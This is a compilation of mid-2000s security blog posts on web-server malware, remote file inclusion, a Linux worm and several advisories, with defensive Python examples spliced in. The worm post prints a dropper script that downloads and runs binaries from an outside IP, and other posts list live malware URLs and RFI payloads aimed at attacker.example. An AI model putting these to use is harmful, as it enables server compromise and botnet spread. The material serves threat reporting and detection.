Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]

hello.

the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with tools, connect-back shells, bots, downloaders, malware, etc., all of which are cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos into attack platforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells have been known for a while, as have file inclusion (rfi) attacks; however, they were mostly treated as something secondary, and not much (if any) attention was given to the subject other than to the vulnerabilities themselves, save for some blogs and a few mailing list posts a year ago.

the bad guys currently exploit, create botnets and deface in a massive fashion, and force isps and colos to combat an impossible situation where any (mainly) php application from any user can be used to compromise entire server farms, and where the web vulnerability serves either as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact that we now start engaging the bad guys on this front (on which, so far, they have been unchallenged). meaning, aside from research, the web honeynet project will also release actionable data on offensive ip addresses, urls and the tools themselves, to be made available to operational folks so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (and quite loudly, me) have been warning about this for a while; now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com ).

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), …
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
                      http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
                      http://m embers.lycos.co.uk/onuhack/cmd.do? (2)
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)


OpenOffice issued a WMF/EMF code execution fix

It appears that a new OpenOffice.org security update has been released.

The Red Hat advisory is located here (rated as Important):
https://rhn.redhat.com/errata/RHSA-2007-0001.html

And what the RHSA-2007:0001-3 states:

Several integer overflow bugs were found in the OpenOffice.org WMF file
processor. An attacker could create a carefully crafted WMF file that could
cause OpenOffice.org to execute arbitrary code when the file was opened by
a victim. (CVE-2006-5870)

The CVE link listed is not accessible yet.
Update: Link to the CVE.

More details are available via Bugzilla bug 217347 (CVE-2006-5870 WMF heap overflow), opened in November. The related OpenOffice Issue 70042, opened on 2nd Oct, is located at www.openoffice.org/issues/show_bug.cgi?id=70042.
Both 1.1.x and 2.x versions are affected and this patch should be obtained.

These vulnerabilities are reported in OpenOffice prior to version 2.1.0.
The previous remarkable ‘OOo’ update was released in June.

It is not known if the critical .DOC issue, CVE-2006-6561 (so-called 12122006-djtest.doc issue) was fixed now. I believe that the answer is No.

Update: StarOffice versions 6, 7 and 8 are affected too. Link to the short advisory of NGSSoftware:
ngssoftware.com/advisories/high-risk-vulnerabilities-in-the-staroffice-suite/


MIME Encoding Content Normalizer (SMTP gateway attacks counter-measures)

victor duchovni agreed to let me post what he employs to avoid such issues as the recent bypass attack against anti-virus gateway solutions.
this is in some ways similar to a limited application firewall for smtp, one which is not spam-specific and handles mime only. yes, i know, smtp application firewalls are the 4th buzzword down the road, give it a couple of years.

victor’s information:

i have a mime normalizer in front of the a/v engine. non-conformant
base64 entities are made conformant or neutered (super-encoded via qp
so that the user receives the base64 text itself as the entity payload).

——–
in:
ct: application/octet-stream
cd: attachment; filename=foo.dat
cte: base64

aa aa
(more…)
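The policy Victor describes, written out as an added Python example (this is not his code, and the exact rules his filter applies are not on the page): a base64 entity that is conformant passes through untouched; one with only cosmetic defects (interior whitespace, missing padding) is re-encoded canonically so the A/V engine and the recipient's client decode the same bytes; anything that cannot be decoded strictly is neutered into a quoted-printable text/plain entity carrying the base64 text itself. The sample message below is constructed for the example and mirrors the foo.dat case above.

```python
import base64
import binascii
import email
import quopri
import re

# A conformant base64 line: alphabet only, '=' padding only at the end.
_B64_LINE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def classify_base64(raw):
    """Classify a raw base64 transport payload.

    Returns ("ok", data) for conformant text, ("repaired", data) when
    dropping whitespace and fixing padding yields strictly valid base64,
    and ("bad", None) when the text cannot be decoded strictly at all.
    """
    body = [ln.rstrip("\r") for ln in raw.split("\n") if ln.rstrip("\r")]
    compact = "".join(body)
    if not compact:
        return "ok", b""  # empty entity: nothing to decode
    conformant = len(compact) % 4 == 0
    for i, ln in enumerate(body):
        # padding anywhere but the last line means two blobs were glued together
        if not _B64_LINE.match(ln) or ("=" in ln and i != len(body) - 1):
            conformant = False
    if conformant:
        try:
            return "ok", base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            pass
    # Repair: strip *all* whitespace (lenient client decoders do the same),
    # then re-pad. Anything outside the alphabet is not repairable.
    compact = "".join(raw.split()).rstrip("=")
    if not _B64_LINE.match(compact):
        return "bad", None
    compact += "=" * (-len(compact) % 4)
    try:
        return "repaired", base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return "bad", None


def normalize_message(msg_bytes):
    """Rewrite every base64 leaf part so that the A/V engine and the user's
    client can only decode one set of bytes. Returns (new_bytes, actions)."""
    msg = email.message_from_bytes(msg_bytes)
    actions = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get("Content-Transfer-Encoding", "").strip().lower() != "base64":
            continue
        raw = part.get_payload()  # transport form, not decoded
        verdict, data = classify_base64(raw)
        if verdict == "repaired":
            # canonical re-encoding: 76-column lines, proper padding
            part.set_payload(base64.encodebytes(data).decode("ascii"))
        elif verdict == "bad":
            # neuter: the base64 *text* becomes a QP text/plain entity, so no
            # downstream decoder gets to guess what the bytes were meant to be
            qp = quopri.encodestring(raw.encode("ascii", "replace")).decode("ascii")
            part.set_payload(qp)
            part.replace_header("Content-Transfer-Encoding", "quoted-printable")
            del part["Content-Type"]
            part["Content-Type"] = 'text/plain; charset="us-ascii"'
            verdict = "neutered"
        actions.append(verdict)
    return msg.as_bytes(), actions


def part_summary(msg_bytes):
    """(content-type, transfer-encoding, raw payload) for each leaf part."""
    msg = email.message_from_bytes(msg_bytes)
    return [(p.get_content_type(), p.get("Content-Transfer-Encoding", "").lower(),
             p.get_payload()) for p in msg.walk() if not p.is_multipart()]


# Constructed sample: one repairable part ("aa aa"), one unrepairable ("aa*aa"),
# one conformant ("aaaa").
SAMPLE = b"""\
From: sender@example.test
To: victim@example.test
Subject: constructed sample for the normalizer
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

see attachments
--b1
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=foo.dat
Content-Transfer-Encoding: base64

aa aa
--b1
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bar.dat
Content-Transfer-Encoding: base64

aa*aa
--b1
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=ok.dat
Content-Transfer-Encoding: base64

aaaa
--b1--
"""

if __name__ == "__main__":
    out, actions = normalize_message(SAMPLE)
    print(actions)
    print(out.decode("ascii"))
```

The bypass this defeats is a disagreement between decoders: the A/V engine rejects or mis-decodes the non-conformant part while the mail client decodes it leniently and hands the user the real payload. After normalization there is exactly one interpretation left, and the engine scans that one.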


perl segfault?

shlomi fish discussed on his blog how he discovered a segfault in perl. looks interesting, but we haven’t verified it:

i discovered a segfault in the perl-5.8.x compilation stage. i discovered it by accident: i was refactoring some code, and added a function, and then it segfaulted. after reducing the code to a minimal form that still exhibited the problem, i found it had a syntax error which triggered the segfault.

the following code when run by perl-5.8.x triggers the segfault:

sub
{
my ($i, $j) = @_;
sub { [ $i->f(); ] };
}

it doesn’t segfault perl-5.6.2. since it is also no longer exhibited in bleadperl, it was closed as “resolved”. however, i wrote the following on what should still be done:

1. add this as a test-case to the perl 5 test-suite.
2. write a patch for the perl-5.8.x line. (which is still heavily used).
3. investigate the crash, and see if it poses security risks. (other than the obvious dos that is caused by the segfault of evaluating such code.)

gadi evron,
ge@beyondsecurity.com.


Plain life is just not random enough

While trying to generate a gpg keypair on a remote server, I discovered I lack entropy. Eventually I had to physically type on the keyboard in order to generate enough random bytes.
A bit of research led me to the following startling thread on the Linux kernel mailing list; someone suggested disabling the entropy gathering from network cards: http://marc.theaimsgroup.com/?l=linux-kernel&m=114684809230875&w=2
* Note that in the stock kernel version, entropy is still gathered from network cards.

I see this as an extremely bad move. ‘Headless’ servers with no keyboard and mouse have very few ways to create random entropy.
Web servers are an extreme example. There are few disk events that can contribute to the amount of entropy, while on the other hand SSL connections require a lot of randomness.

This decision, if indeed accepted, is completely absurd. If someone decides to cancel network card as a source to random number generation, at least leave it as an option to the kernel module, a /proc entry or something. Why just diff it out??

To make things worse, Intel used to provide an onboard random number generator. This initiative was torpedoed, and the chip no longer exists in modern boards. There goes another source of random entropy out the window.

Modern day servers require more sources of entropy than ever. We use VPNs, SSH and HTTPS. Let’s face it, SSL is ubiquitous.

As an example, try to run 4 simultaneous ssh connections to a dedicated web server (for some time, at least 4-5 hours), and try to generate a GPG keypair. 9 out of 10 times you’ll be out of entropy.

Suggested solutions like gathering entropy from the sound card don’t cut it for production servers.
There are of course the dedicated PCI cards: http://www.broadcom.com/collateral/pb/5802-PB05-R.pdf
http://www.idquantique.com/products/quantis.htm

But then we could also ask for a Schrödinger’s cat that sits in a conveniently located alternate universe to establish SSL handshakes for us.

Attacks on PRNGs are well documented. Today no one believes that clock interrupts are cryptographically random. For example, look at: http://www.gutterman.net/publications/GuttermanPinkasReinman2006.pdf

I would love to hear your opinions and suggestions from security point of view.


Zeppoo: Decent Rootkit Detection for Linux

rootkit detection has been going on for a long time on linux, far longer than on windows.

often it was just “signature based” such as with chkrootkit, finding already known rootkits. windows rootkit detection tools only showed up in the last couple of years and are more generic in nature, looking at different hooks and signs of foul play. still, they are far from mature and the technology for detection is still behind what the bad guys are using.

zeppoo is a new tool for rootkit detection on linux that works generically, catching up to the windows technology.

on dick’s diary, he writes of this new tool, and says:

a clever tool i’ve been watching for some time called zeppoo has reached a mature release stage today. zeppoo allows the user to detect rootkits on the i386 architecture under linux by using /dev/kmem and /dev/mem. it’s very useful at detecting hidden tasks, modules, syscalls, some corrupted symbols, and hidden connections. anti-rootkits which don’t use these methods can be fooled easily.

you can find more information on zeppoo’s project page here.

zeppoo’s homepage is here.

gadi evron,
ge@beyondsecurity.com.


Plupii.C proved: Remarkable old Mambo CMS installations in use

Systems behind content management system based Web sites are not always patched. Patching delays are not measured in weeks; in fact, they run to many months.

The XML-RPC for PHP vulnerability from June 2005 is not the only security issue being exploited in this new Linux worm case. One of the other vulnerabilities is the GLOBALS['mosConfig_absolute_path'] issue, CVE-2005-0512, reported and fixed exactly one year ago. This code injection issue affects Mambo 4.5.2 and earlier.

At this time, Mambo defacement reports from volunteers have helped the Internet Storm Center conclude that a new Plupii variant is spreading. Sometimes even the word ‘mambo’ in the URL helps confirm that Mambo sites are the target of the defacement; see new ones at www.zone-h.org/en/defacements/view/id=3354748/ etc.

A fixed Mambo version, 4.5.2.1, is available, but administrators simply didn’t patch their systems.
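The mosConfig_absolute_path issue is a remote file inclusion of the kind the Web Honeynet post at the top of this page reports on: the parameter value ends up as the base path of an include(), so pointing it at a URL makes PHP (with URL includes enabled) fetch and run the attacker's script, which is exactly what the cmd.gif? and injek.txt? entries in that report are. The following is an added Python example, not code from any of the posts, that pulls such attempts out of Apache combined-format access logs and summarizes them per source address in the same ip | hit count | url (count) shape as that report. The log lines are constructed for the example (TEST-NET addresses, an invented attacker hostname).

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format.
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
_REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def rfi_candidates(target):
    """Return [(param, url)] for query parameters whose value is a remote URL.

    The query is parsed twice, the second time after one extra round of
    percent-decoding, so %25-double-encoded payloads are caught as well.
    """
    try:
        query = urlsplit(target).query
    except ValueError:
        return []  # hopelessly malformed request line; nothing to decode
    seen, hits = set(), []
    for _ in range(2):
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if _REMOTE.match(value) and (name, value) not in seen:
                seen.add((name, value))
                hits.append((name, value))
        query = unquote(query)
    return hits


def scan_log(lines):
    """Extract RFI attempts from log lines.

    Returns (hits, per_ip): hits is a list of dicts in log order; per_ip maps
    each source address to a Counter of the remote URLs it tried to include.
    """
    hits, per_ip = [], defaultdict(Counter)
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, url in rfi_candidates(m["target"]):
            hits.append({"ip": m["ip"], "param": param, "url": url,
                         "status": int(m["status"]),
                         # a trailing '?' turns whatever the app appends to the
                         # include path into a query string for the attacker's host
                         "trailing_q": url.endswith("?")})
            per_ip[m["ip"]][url] += 1
    return hits, per_ip


def report(per_ip):
    """Render rows as 'ip | hit count | url (count), ...', busiest source first."""
    rows = []
    for ip, urls in sorted(per_ip.items(), key=lambda kv: -sum(kv[1].values())):
        cell = ", ".join(f"{u} ({n})" for u, n in urls.most_common())
        rows.append(f"{ip} | {sum(urls.values())} | {cell}")
    return rows


# Constructed sample log: plain, percent-encoded and double-encoded RFI
# attempts, plus one legitimate request.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2007:03:12:44 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http://attacker.example/cmd.gif? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Jan/2007:03:12:45 +0000] "GET /mambo/index.php?GLOBALS[mosConfig_absolute_path]=http%3A%2F%2Fattacker.example%2Finjek.txt%3F HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Jan/2007:03:13:01 +0000] "GET /page.php?page=%2568ttp%253A%252F%252Fattacker.example%252Fcmd.gif%253F HTTP/1.0" 404 221 "-" "Mozilla/4.0"
192.0.2.55 - - [10/Jan/2007:03:14:09 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8811 "http://www.example/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found, by_ip = scan_log(SAMPLE_LOG.splitlines())
    for h in found:
        print(h)
    print("\n".join(report(by_ip)))
```

Two things worth keeping from this when writing a real signature: decode the query more than once, because the double-encoded third line is invisible to a single-pass match, and alert on the trailing ? by itself, since no legitimate parameter value ends that way and it is the tell that the URL was built to survive whatever the application appends.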


PHP as a secure language? PHP worms?

like i just wrote to bugtraq on this subject (it’s being discussed there now), indeed, the most annoying thing about the php worms today is that these php vulnerabilities being exploited are everywhere.

as i already mentioned, this recent linux worm has more to it, but that’s in another post.

these vulnerabilities being exploited are very difficult to protect from because:
1. php is the “serious” or at least open-source/linux/security freak’s choice for web development. mine as well (although as many still say, perl does a better job).

2. developing secure applications in php is difficult, as one of php’s creators said recently – even to him after years of trying.

3. staying on top of new php vulnerabilities has become almost impossible; they are popping up everywhere.

4. determining how secure a php application is by looking at the code and at how silly its past vulnerabilities were (i.e. looking at the coder rather than the code) is now more important than the actual application.

much as their own self-criticism said, php needs to grow into a far more secure language, much like we need to choose more carefully what php software we use.

some of us have been joking for a while about creating a script that chooses from different paragraphs we write and emails bugtraq, re-assembling them randomly with a new php bug and a random php application name every few hours. would any of us be able to readily tell the difference?

from all the fish we can barely see the water. :(

as to the worms, this has been going on for longer than the 2 months the person i was replying to mentioned, but he is correct.

one note i’d like to make: even if the second (interesting) payload in the linux worm wasn’t there, just because someone utilizes old malware in the creation of new malware doesn’t mean it isn’t new, or 99.9% of any “virus” ever written would be old.

does bagle.**** ring a bell with anyone? :)

if any of you are interested in sharing web server logs and be notified of new php problems we all notice online, drop me a note.

gadi evron,
ge@beyondsecurity.com.


More info on the new Linux worm

the first part of the worm is yet another php worm (attacking drupal, wordpress, etc.).
more information on older versions here:
http://isc.sans.org/diary.php?storyid=823

there is another shell script called gicumz there:

#!/bin/bash
cd /tmp
wget 209.123.16.34/session
chmod +x session
./session
cd /tmp
wget 209.123.16.34/derfiq
chmod +x derfiq
./derfiq

the worm itself that runs on the linux system though, is something new as far as we can tell.

gadi evron,
ge@beyondsecurity.com.


New Linux malware part of a botnet C&C

it has just been confirmed the new linux malware is being controlled by a botnet c&c (command & control) server.

efforts are being made to take care of that server and notify the relevant isps.

gadi evron,
ge@beyondsecurity.com.


New Linux malware

[there are several updates on this subject on the main blogs site]

today, we received a notification about a new linux malware itw (in the wild).

chas tomlin provided shadowserver and nicholas alright, who notified the relevant operational communities, with the information on the binaries. he captured them with sguil.

chas is working with shadowserver to identify better ways to track down/take down botnets.

the credit should go to him and shadowserver.

shadowserver has been a responsible and essential part of recent internet security activities.

as anti virus vendors have been notified and will soon do a write-up on it, i see no reason not to publicize it here.

md5:
c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq
e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session

we are not quite sure as of yet exactly what this does, it can be a linux virus, a linux trojan horse, a linux worm… we are not even sure if the checksums above are useful at all. we hope to know more soon and we will update as we do.

there are some interesting strings to be noted:

notice %s :tsunami     = special packeter that wont be blocked by most firewalls
notice %s :pan         = an advanced syn flooder that will kill most network drivers
notice %s :udp         = a udp flooder
notice %s :unknown     = another non-spoof udp flooder
notice %s :nick        = changes the nick of the client
notice %s :server      = changes servers
notice %s :getspoofs   = gets the current spoofing
notice %s :spoofs      = changes spoofing to a subnet
notice %s :disable     = disables all packeting from this client
notice %s :enable      = enables all packeting from this client
notice %s :kill        = kills the client
notice %s :get         = downloads a file off the web and saves it onto the hd
notice %s :version     = requests version of client
notice %s :killall     = kills all current packeting
notice %s :help        = displays this
notice %s :irc         = sends this command to the server
notice %s :sh          = executes a command
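With most of the engines in the tables that follow reporting nothing, a string-and-hash check is the quickest triage a responder can run on a suspect binary. The following is an added Python example (not part of the original write-up) that reuses the two MD5s and a handful of the help strings above as indicators: a hash match identifies the exact sample, and the IRC help-line layout identifies a recompiled or slightly modified variant that no hash would catch. The two blobs it scans are constructed stand-ins, not the real files.

```python
import hashlib
import re

# Indicators taken from the write-up: the two MD5s and a subset of the
# IRC help strings embedded in the 'session' binary.
KNOWN_MD5 = {
    "c2576aeff0fd9267b6cc3a7e1089e05d": "derfiq",
    "e9a2b13fe02d013cc5e11ee586d11c38": "session",
}
KAITEN_HELP_STRINGS = [
    b"notice %s :tsunami",
    b"notice %s :pan",
    b"notice %s :udp",
    b"notice %s :getspoofs",
    b"notice %s :killall",
    b"notice %s :sh",
]
# One bot help line: 'notice %s :<command>   = <description>'
_IRC_HELP_LINE = re.compile(rb"notice %s :(\w+)\s+= ")


def scan_bytes(blob, min_strings=3):
    """Triage a binary's contents.

    Returns a dict with the MD5, the known-sample name if the hash matches,
    the bot commands advertised in the blob, and a verdict of
    'known-sample', 'kaiten-like' (at least min_strings help strings) or 'clean'.
    """
    digest = hashlib.md5(blob, usedforsecurity=False).hexdigest()
    known = KNOWN_MD5.get(digest)
    commands = sorted({m.group(1).decode("ascii") for m in _IRC_HELP_LINE.finditer(blob)})
    string_hits = [s for s in KAITEN_HELP_STRINGS if s in blob]
    if known:
        verdict = "known-sample"
    elif len(string_hits) >= min_strings:
        verdict = "kaiten-like"
    else:
        verdict = "clean"
    return {"md5": digest, "known_as": known, "commands": commands,
            "string_hits": len(string_hits), "verdict": verdict}


def scan_file(path, **kwargs):
    """scan_bytes() over a file on disk."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read(), **kwargs)


# Constructed stand-in for a stripped ELF: a header, padding, then help lines
# in the same layout as the real bot. Not a real sample.
SAMPLE_BOT = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 32
    + b"notice %s :tsunami     = special packeter that wont be blocked by most firewalls\x00"
    + b"notice %s :pan         = an advanced syn flooder that will kill most network drivers\x00"
    + b"notice %s :udp         = a udp flooder\x00"
    + b"notice %s :sh          = executes a command\x00"
    + b"\x00" * 16
)
SAMPLE_BENIGN = b"\x7fELF" + b"hello world\x00" * 8

if __name__ == "__main__":
    print(scan_bytes(SAMPLE_BOT))
    print(scan_bytes(SAMPLE_BENIGN))
```

The help strings are a better indicator than the hash here: the operator only has to rebuild the binary to invalidate the MD5, while the command table survives recompilation, and the regex also gives you the variant's full command list for the report.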

‘session’, current detection:
antivir               6.33.1.50/20060218       found bds/katien.r
avast                 4.6.695.0/20060216       found nothing
avg                   718/20060217             found nothing
avira                 6.33.1.50/20060218       found bds/katien.r
bitdefender           7.2/20060218             found nothing
cat-quickheal         8.00/20060216            found nothing
clamav                devel-20060126/20060217  found nothing
drweb                 4.33/20060218            found nothing
etrust-inoculateit    23.71.80/20060218        found nothing
etrust-vet            12.4.2086/20060217       found nothing
ewido                 3.5/20060218             found nothing
fortinet              2.69.0.0/20060218        found nothing
f-prot                3.16c/20060217           found nothing
ikarus                0.2.59.0/20060217        found backdoor.linux.keitan.c
kaspersky             4.0.2.24/20060218        found backdoor.linux.keitan.c
mcafee                4700/20060217            found linux/ddos-kaiten
nod32v2               1.1413/20060217          found nothing
norman                5.70.10/20060217         found nothing
panda                 9.0.0.4/20060218         found nothing
sophos                4.02.0/20060218          found nothing
symantec              8.0/20060218             found backdoor.kaitex
thehacker             5.9.4.098/20060218       found nothing
una                   1.83/20060216            found nothing
vba32                 3.10.5/20060217          found nothing

‘derfiq’ current detection:
antivir               6.33.1.50/20060218       found worm/linux.lupper.b
avast                 4.6.695.0/20060216       found nothing
avg                   718/20060217             found nothing
avira                 6.33.1.50/20060218       found worm/linux.lupper.b
bitdefender           7.2/20060218             found nothing
cat-quickheal         8.00/20060216            found nothing
clamav                devel-20060126/20060217  found nothing
drweb                 4.33/20060218            found nothing
etrust-inoculateit    23.71.80/20060218        found nothing
etrust-vet            12.4.2086/20060217       found nothing
ewido                 3.5/20060218             found nothing
fortinet              2.69.0.0/20060218        found nothing
f-prot                3.16c/20060217           found nothing
ikarus                0.2.59.0/20060217        found net-worm.linux.lupper.b
kaspersky             4.0.2.24/20060218        found nothing
mcafee                4700/20060217            found nothing
nod32v2               1.1413/20060217          found nothing
norman                5.70.10/20060217         found nothing
panda                 9.0.0.4/20060218         found nothing
sophos                4.02.0/20060218          found nothing
symantec              8.0/20060218             found hacktool
thehacker             5.9.4.098/20060218       found nothing
una                   1.83/20060216            found nothing
vba32                 3.10.5/20060217          found nothing

this write-up can be found here:
http://blogs.securiteam.com/index.php/archives/303

we will notify as we get new updates here:
http://blogs.securiteam.com

gadi evron,
ge@beyondsecurity.com.


Linux kernel remote DoS, 20 mailing lists to read, best security training and insecure appliances

the sans isc reported on this:
http://isc.sans.org/diary.php?storyid=1125

two things i’d like to discuss are:
1. how many mailing lists do we have to read?

2. how real security training is done.

and

3. how this linux kernel vulnerability affects you where you may not even realize it.

on the first point – plenty. if you want to be in the security industry, read your favorite blog(s) or stay on 50 mailing lists reading a bunch of cesspool cr*p every day. that’s how it is.
:)

that’s how real training in the security industry is done today. show me an alternative to the wide-range of knowledge, developing security-minded thinking and the right paranoia backed up by wisdom and tech-savvy? as well as knowing the b/s from what’s real.

as to this linux kernel vulnerability… how many of us heard about it? mailing lists are not perfect. however, most of those who would update their machines by now, already did.

what about the machines you can’t update and/or don’t know about?

how many third-party appliances such as application firewalls, i[dp]s systems and other such cr*p do you have on your network or worse – before it, ready to be exploited?

how many of these appliances run linux? how many of them run windows?
how many of them are secure enough to even have basic ports closed?

port scan them and find out.

when was the last time you received a vendor update for the machine itself?

i’d start worrying if i were you. not everything is a dos, and a dos from the entry to your network by one of your own machines is kind of bad, although solvable once you realize what causes it.

gadi evron,
ge@beyondsecurity.com.


Slackware Hardening Tutorial

Slackware hasn’t been in the spotlight for ages, but before I go into a long rant about how the only Linux I would dare use is Slackware, let’s get to the point.

Slackware is known for its security, but as we all know, systems are only as secure as their administrators are paranoid; however, it helps to have a good (great) foundation.

Jeffrey Denton (dentonj) has compiled an elaborate tutorial on improving the overall security of Slackware Linux. I’ve known dentonj from IRC for a good bit of time, and though he has kicked me for being a dink a few times, he has my respect. I’ve read through this tutorial and found it up to par for even the most paranoid. Surprisingly enough, most of it I have already done. Other parts I found so ingenious, I had to implement them.

Please take note that dentonj is doing some contract work in Iraq at the moment… or “war driving in the states got boring,” as he put it… so the document is still a work-in-progress.

You can read the document here or here.


KDE JS bug poses a real threat

(Updated: January 21, 2006 @ 21:19, 21:23)

A security vulnerability in KDE’s JavaScript interpreter allows remote attackers to cause a user visiting a malicious web page to execute arbitrary code by overflowing the KJS (KDE JavaScript) UTF-8 decoder.

The vulnerability can be triggered by any program that utilizes KJS, i.e. the vulnerability is not limited to Konqueror.

More information to come as technical details start to surface.

Update:
The patch found in ftp://ftp.kde.org/pub/kde/security_patches/post-3.2.3-kdelibs-kjs.diff offers some insight into the problem; the vulnerable JavaScript functions apparently are encodeURI and decodeURI.

Update 2: The CVE-2006-0019 entry has not been released yet, but keep watching.


WINE vulnerable to WMF vulnerability

The vulnerability recently discovered in Windows, and patched just several days ago, has been found to be exploitable on WINE-based systems as well; this also includes the CrossOver Office package.

According to H D Moore, wine-20050930/dlls/gdi/driver.c includes:

/**************************************************************
Escape [GDI32.@]
*/
INT WINAPI Escape( HDC hdc, INT escape, INT in_count, LPCSTR in_data,
LPVOID out_data )
{
INT ret;
POINT *pt;

switch (escape)
{
case ABORTDOC:
return AbortDoc( hdc );
[ snip ]
case SETABORTPROC:
return SetAbortProc( hdc, (ABORTPROC)in_data );
[ snip ]

And wine-20050930/dlls/gdi/printdrv.c includes:

/**********************************************************
* call_abort_proc16
*/
static BOOL CALLBACK call_abort_proc16( HDC hdc, INT code )
{
ABORTPROC16 proc16;
DC *dc = DC_GetDCPtr( hdc );

if (!dc) return FALSE;
proc16 = dc->pAbortProc16;
GDI_ReleaseObj( hdc );
if (proc16)
{
WORD args[2];
DWORD ret;

args[1] = HDC_16(hdc);
args[0] = code;
WOWCallback16Ex( (DWORD)proc16, WCB16_PASCAL, sizeof(args), args,
&ret );
return LOWORD(ret);
}
return TRUE;
}

/******************************************************
* SetAbortProc (GDI32.@)
*
*/
INT WINAPI SetAbortProc(HDC hdc, ABORTPROC abrtprc)
{
DC *dc = DC_GetDCPtr( hdc );

if (!dc) return FALSE;
dc->pAbortProc = abrtprc;
GDI_ReleaseObj( hdc );
return TRUE;
}

Finally wine-20050930/dlls/gdi/printdrv.c includes:

/******************************************************************
* EndPage [GDI32.@]
*
*/
INT WINAPI EndPage(HDC hdc)
{
ABORTPROC abort_proc;
INT ret = 0;
DC *dc = DC_GetDCPtr( hdc );
if(!dc) return SP_ERROR;

if (dc->funcs->pEndPage) ret = dc->funcs->pEndPage( dc->physDev );
abort_proc = dc->pAbortProc;
GDI_ReleaseObj( hdc );
if (abort_proc && !abort_proc( hdc, 0 ))
{
EndDoc( hdc );
ret = 0;
}
return ret;
}
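Read together, the three excerpts show the whole chain: Escape() maps a SETABORTPROC escape to SetAbortProc(), which stores the caller-supplied in_data pointer as the DC's abort procedure, and EndPage() later calls that pointer. A metafile is a list of GDI records, so a crafted WMF can carry that escape. As an added Python example (not WINE's code or H D Moore's), the following parses the WMF record table and flags any META_ESCAPE record whose escape function is SETABORTPROC (record function 0x0626 and escape value 9 in the MS-WMF numbering), which an image has no legitimate reason to contain; a malformed record table is refused as well. The two sample files are built inside the block, and the escape payload is filler bytes, not shellcode.

```python
import struct

META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009        # MetafileEscapes value carried inside META_ESCAPE
PLACEABLE_KEY = 0x9AC6CDD7   # optional 22-byte Aldus placeable header
MM_ANISOTROPIC = 8


def iter_wmf_records(data):
    """Yield (offset, function, params) for each record in a WMF blob.

    Handles files with or without the placeable header. Raises ValueError on
    a truncated header, a record shorter than the 3 WORDs every record needs,
    a record that runs past the end of the file, or a missing META_EOF.
    """
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22
    if len(data) < off + 18:
        raise ValueError("truncated WMF header")
    mtype, hdr_words = struct.unpack_from("<HH", data, off)
    if mtype not in (1, 2) or hdr_words != 9:
        raise ValueError("not a WMF header")
    off += hdr_words * 2
    while off + 6 <= len(data):
        size_words, function = struct.unpack_from("<IH", data, off)
        if size_words < 3:
            raise ValueError(f"record at {off} claims {size_words} words")
        end = off + size_words * 2
        if end > len(data):
            raise ValueError(f"record at {off} runs past end of file")
        yield off, function, data[off + 6:end]
        if function == META_EOF:
            return
        off = end
    raise ValueError("no META_EOF record")


def find_abortproc_escapes(data):
    """Return [(offset, byte_count)] for every META_ESCAPE/SETABORTPROC record."""
    found = []
    for off, function, params in iter_wmf_records(data):
        if function != META_ESCAPE or len(params) < 4:
            continue
        esc_func, byte_count = struct.unpack_from("<HH", params, 0)
        if esc_func == SETABORTPROC:
            found.append((off, byte_count))
    return found


def is_suspicious(data):
    """A picture never needs a printer abort procedure: any SETABORTPROC
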